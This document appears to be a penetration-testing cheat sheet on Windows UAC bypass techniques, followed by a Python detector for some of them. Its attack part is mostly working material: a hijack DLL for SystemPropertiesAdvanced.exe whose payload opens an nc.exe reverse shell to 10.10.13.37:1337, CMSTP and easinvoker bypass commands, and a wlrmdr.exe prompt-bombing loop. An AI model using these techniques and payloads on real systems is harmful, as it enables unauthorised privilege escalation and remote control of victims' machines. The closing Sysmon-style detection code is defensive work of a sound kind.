# UAC Bypass

* <https://github.com/hfiref0x/UACME>
* <https://github.com/sailay1996/UAC_Bypass_In_The_Wild>
* <https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC>

## Enumeration

Check current token privileges and UAC settings with Seatbelt:

```
PS > .\Seatbelt.exe TokenPrivileges UAC
```

## SystemPropertiesAdvanced.exe

`srrstr.dll` DLL hijacking.

* <https://egre55.github.io/system-properties-uac-bypass>

{% embed url="<https://youtu.be/krC5j1Ab44I?t=3570>" %}

{% code title="srrstr.c" %}

```c
// i686-w64-mingw32-g++ srrstr.c -lws2_32 -o srrstr.dll -shared

#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved) {
    switch(dwReason) {
        case DLL_PROCESS_ATTACH:
            // Runs as soon as the hijacked DLL is mapped into the auto-elevated process
            WinExec("C:\\Users\\<USERNAME>\\Documents\\nc.exe 10.10.13.37 1337 -e powershell", 0);
            break;
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            break;
    }

    // FALSE on DLL_PROCESS_ATTACH makes the loader fail the load and unmap the DLL;
    // the payload has already been spawned by then
    return 0;
}
```

{% endcode %}

Upload `srrstr.dll` to `C:\Users\%USERNAME%\AppData\Local\Microsoft\WindowsApps\` and check it:

```
PS > rundll32.exe srrstr.dll,xyz
```

Run the 32-bit binary to trigger the hijack and get a shell (it "requires an interactive window station"):

```
PS > cmd /c C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
```

## cmstp.exe

* [0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html](https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html)
* <https://gist.github.com/snovvcrash/56d51e535c3afd89a1e9e68c284553a6>

Compile from source, load and execute:

```
PS > Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\Source.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "CMSTP-UAC-Bypass.dll"
PS > [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\CMSTP-UAC-Bypass.dll"))
PS > [CMSTPBypass]::Execute("C:\Windows\System32\cmd.exe")
```

Load from a weaponized PowerShell and execute:

```
PS > Bypass-UAC -C "C:\Windows\System32\cmd.exe"
```

## easinvoker.exe

* <https://github.com/sailay1996/UAC_Bypass_In_The_Wild/tree/master/FileSys_UAC_Bypass/uac_easinvoker>
* [https://github.com/g3tsyst3m/elevationstation/blob/main/elevationstation/elevationstation.cpp](https://github.com/g3tsyst3m/elevationstation/blob/ba521d9901c98458526c1790b2b0ed0b370796bc/elevationstation/elevationstation.cpp#L895-L903)

Mock trusted directory: create `C:\Windows \System32` (note the trailing space after `Windows`), copy the auto-elevating `easinvoker.exe` there next to a planted `netutils.dll`, run it, then clean up:

```
mkdir "\\?\C:\Windows "
mkdir "\\?\C:\Windows \System32"
copy c:\windows\system32\easinvoker.exe "C:\Windows \System32"
copy netutils.dll "C:\Windows \System32"
"C:\Windows \System32\easinvoker.exe"
del /q "C:\Windows \System32\*"
rmdir "C:\Windows \System32"
rmdir "C:\Windows \"
```

## fodhelper.exe

* <https://gist.github.com/netbiosX/a114f8822eb20b115e33db55deee6692>
* <https://binary-win.github.io/2025/08/22/UAC-Bypass.html>
* <https://v3ded.github.io/redteam/utilizing-programmatic-identifiers-progids-for-uac-bypasses>

## SilentCleanup

* <https://hausec.com/2020/10/30/using-a-c-shellcode-runner-and-confuserex-to-bypass-uac-while-evading-av/>
* <https://github.com/chryzsh/Aggressor-Scripts/tree/master/uac-bypass>

## SCM UAC Bypass

* <https://www.tiraniddo.dev/2022/03/bypassing-uac-in-most-complex-way.html>
* <https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82>
* <https://whoamianony.top/posts/revisiting-a-uac-bypass-by-abusing-kerberos-tickets/>
* <https://github.com/wh0amitz/KRBUACBypass>

## Task Scheduler

* <https://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html>
* <https://github.com/zcgonvh/TaskSchedulerMisc/blob/master/schuac.cs>

## UAC Prompt Bombing

* <https://www.esentire.com/blog/new-botnet-emerges-from-the-shadows-nightshadec2>
* [\[YouTube\] How Hackers Become Admin (they just ask)](https://youtu.be/JpWbytYrL2s)

```powershell
try {throw ""} catch {while (-not $?){try {Start-Process wlrmdr.exe -ArgumentList "-s 3600 -f 0 -t _ -m _ -a 11 -u cmd.exe" -Verb RunAs} catch {Write-Error "" -ErrorAction SilentlyContinue}}}
```

## Tricks

Bypass UAC for file read/write by mapping the local admin share over loopback:

```
Cmd > net use A: \\127.0.0.1\C$
Cmd > A:
Cmd > cd \Windows\System32
Cmd > echo test > test.txt
Cmd > dir test.txt
```
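Detection logic for several of the patterns on this page (the mock trusted directory used with `easinvoker.exe`, `srrstr.dll` resolved from a user-writable directory, `wlrmdr.exe` prompt bombing, and loopback admin-share mapping), as an added example that is not part of the original page. It runs over constructed Sysmon-style log lines; the field names, the sample paths and the user name `bob` are assumptions.

```python
import re

# Constructed Sysmon-style lines (not real telemetry) for the techniques on this page.
SAMPLE_LOGS = [
    'EventID=1 Image="C:\\Windows \\System32\\easinvoker.exe" CommandLine="C:\\Windows \\System32\\easinvoker.exe" IntegrityLevel=High',
    'EventID=7 Image="C:\\Windows\\SysWOW64\\SystemPropertiesAdvanced.exe" ImageLoaded="C:\\Users\\bob\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll" Signed=false',
    'EventID=1 Image="C:\\Windows\\System32\\wlrmdr.exe" CommandLine="wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u cmd.exe" IntegrityLevel=High',
    'EventID=1 Image="C:\\Windows\\System32\\net.exe" CommandLine="net use A: \\\\127.0.0.1\\C$" IntegrityLevel=Medium',
    'EventID=1 Image="C:\\Windows\\System32\\notepad.exe" CommandLine="notepad.exe" IntegrityLevel=Medium',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
SYSTEM_DIR_RE = re.compile(r'(?i)^[a-z]:\\windows\\(system32|syswow64)\\')

def parse(line):
    """Turn 'Key=value Key="quoted value"' into a dict (assumed log shape)."""
    return {k: q or u for k, q, u in FIELD_RE.findall(line)}

def detect(line):
    """Return the names of every UAC-bypass pattern the line matches."""
    f = parse(line)
    image, cmd, loaded = f.get("Image", ""), f.get("CommandLine", ""), f.get("ImageLoaded", "")
    hits = []
    # 1) Mock trusted directory: a "Windows " folder with a trailing space never
    #    occurs legitimately, so any such path component is suspicious.
    if re.search(r'\\Windows \\', "|".join((image, cmd, loaded))):
        hits.append("mock_trusted_directory")
    # 2) srrstr.dll resolved from outside the Windows system directories
    #    (e.g. the user-writable WindowsApps folder that sits on the user's PATH).
    if loaded.lower().endswith("\\srrstr.dll") and not SYSTEM_DIR_RE.match(loaded):
        hits.append("srrstr_dll_hijack")
    # 3) Prompt bombing: wlrmdr.exe started with -u to launch an arbitrary program.
    if image.lower().endswith("\\wlrmdr.exe") and re.search(r'(?i)(^|\s)-u\s+\S+', cmd):
        hits.append("wlrmdr_prompt_bombing")
    # 4) Loopback admin-share mapping (\\127.0.0.1\C$) from a medium-integrity process.
    if f.get("IntegrityLevel") == "Medium" and re.search(
            r'(?i)\bnet(\.exe)?\s+use\b.*\\\\(127\.0\.0\.1|localhost)\\[a-z]\$', cmd):
        hits.append("loopback_admin_share")
    return hits

def scan(lines):
    """Map each pattern name to the 0-based indices of the lines that triggered it."""
    report = {}
    for i, line in enumerate(lines):
        for name in detect(line):
            report.setdefault(name, []).append(i)
    return report
```

A legitimate load of `srrstr.dll` from `C:\Windows\System32` and an ordinary process start produce no hits, so the rules key on the anomalous location or argument rather than on the binary name alone.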
